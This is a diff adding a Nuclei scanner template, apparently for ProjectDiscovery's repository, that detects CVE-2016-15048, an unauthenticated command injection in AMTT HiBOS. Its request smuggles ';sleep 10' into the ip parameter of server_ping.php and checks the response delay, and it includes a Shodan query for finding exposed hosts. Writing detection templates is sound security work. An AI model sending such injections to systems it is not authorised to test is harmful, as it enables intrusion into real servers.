projectdiscovery · DanLika · Jan 1, 2026 · Jan 1, 2026
diff --git a/http/cves/2016/feat(cve-2016-15048): Add precise Nuclei template for HiBOS RCE #14665 b/http/cves/2016/feat(cve-2016-15048): Add precise Nuclei template for HiBOS RCE #14665
@@ -0,0 +1,35 @@
+id: CVE-2016-15048
+
+info:
+  name: AMTT Hotel Broadband Operation System (HiBOS) - Command Injection
+  author: a-b-r-o-w
+  severity: critical
+  description: |
+    AMTT Hotel Broadband Operation System (HiBOS) contains an unauthenticated blind command injection caused by improper validation of the ip parameter in /manager/radius/server_ping.php, letting remote attackers execute arbitrary system commands as the web server user, exploit requires no authentication.
+  reference:
+    - https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-15048
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2016-15048
+    cwe-id: CWE-78
+  tags: cve,cve2016,hibos,rce,unauth,amtt
+  metadata:
+    verified: false
+    shodan-query: http.html:"HiBOS"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/manager/radius/server_ping.php?id=1&ip=;sleep 10"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=10'
+
+      - type: status
+        status:
+          - 200